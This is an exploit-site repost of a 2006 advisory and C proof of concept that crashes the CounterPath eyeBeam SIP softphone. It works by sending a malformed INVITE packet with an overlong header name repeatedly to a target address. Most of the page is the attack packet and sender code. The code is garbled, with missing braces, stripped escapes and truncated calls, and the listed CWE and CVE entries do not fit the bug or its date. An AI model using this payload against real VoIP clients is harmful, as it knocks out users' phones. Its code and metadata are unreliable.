CounterPath eyeBeam Handing SIP header Vulnerabilities

CVE Category Price Severity
CVE-2008-8008 CWE-79 $5000 High
Author Risk Exploitation Type Date
Sipera ViperLab High Remote 2006-01-28
Our sensors found this exploit at:

Below is a copy:

eyeBeam is a SIP softphone supporting open standards for VoIP, Video and Instant Messaging. 
There is a vunerability in it while handing SIP header with a large field name like this:
INVITE sip:a (at) 127.0.0 (dot) 1 [email concealed] SIP/2.0
Via: SIP/2.0/UDP;branch=z9hG4bK00001249z9hG4bK.00004119
From: 1249 <sip:a (at) 127.0.0 (dot) 1 [email concealed]>;tag=1249
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Receiver <sip:100012 (at) 172.16.1 (dot) 1 [email concealed]>
Call-ID: 4166@<>   <--Change it to target IP
CSeq: 18571 INVITE
Expires: 1200
Max-Forwards: 70
Content-Type: application/sdp
Content-Length: 130

o=1249 1249 1249 IN IP4
s=Session SDP
c=IN IP4
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000

If you send the packet(several times) to eyeBeam when it's starting and have no call opreation, 
then it will crashed for reading a unvalid address which we can control. 
If you send it(several times) when it's in a call, then it will be unresponse(will not dial and receive any more) or crashed for writing a address(cannot control it now, but it's possible, and as I think, it can lead to execute code).
It looks like some memory operation error exists.

Addtion : the lastest version is affected.


eyeBeam handling SIP header DOS POC
Author : ZwelL
Email : zwell (at) sohu (dot) com [email concealed]
Blog :
Data : 2006.1.15

#include <stdio.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

char *sendbuf1 = 
"INVITE sip:a (at) 127.0.0 (dot) 1 [email concealed] SIP/2.0rn"
"Via: SIP/2.0/UDP;branch=z9hG4bK00001249z9hG4bK.00004119rn"
"From: test <sip:a (at) 127.0.0 (dot) 1 [email concealed]>;tag=1249rn"
"aaaaaaaa: test <sip:a (at) 127.0.0 (dot) 1 [email concealed]>rn";

char *sendbuf2 =
"CSeq: 18571 INVITErn"
"Expires: 1200rn"
"Max-Forwards: 70rn"
"Content-Type: application/sdprn"
"Content-Length: 130rn"
"o=1249 1249 1249 IN IP4"
"s=Session SDPrn"
"c=IN IP4"
"t=0 0rn"
"m=audio 9876 RTP/AVP 0rn"
"a=rtpmap:0 PCMU/8000rn";

int main(int argc, char **argv) 
    WSADATA wsaData;
    SOCKET    sock;
    sockaddr_in RecvAddr;
char sendbuf[4096];
int iResult;
int port = 8376; //default is 8376, but SIP's default port is 5060

printf("eyeBeam handling SIP header DOS POCnAuthor : ZwelLn");
printf("Email : zwell (at) sohu (dot) com [email concealed]nBlog :");
if(argc < 2)
printf("Usage : %s <target ip> [port]n", argv[0]);
return 0;

if(argc == 3)
port = atoi(argv[2]);

iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
    if (iResult != NO_ERROR)
        printf("Error at WSAStartup()n");
return 0;


ZeroMemory(&RecvAddr, sizeof(RecvAddr));
    RecvAddr.sin_family = AF_INET;
    RecvAddr.sin_port = htons((short)port); 
    RecvAddr.sin_addr.s_addr = inet_addr(argv[1]);

printf("Target is : %st port is : %drn", argv[1], port);
for(int i=0; i<20; i++)
sprintf(sendbuf, "%sCall-ID: 4166@<%s>rn%s", sendbuf1, argv[1], sendbuf2);
if(SOCKET_ERROR == sendto(sock, 
(SOCKADDR *) &RecvAddr, 
printf("sendto wrong:%dn", WSAGetLastError());
printf("Now check the target is crafted?rn");

    return 1;

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum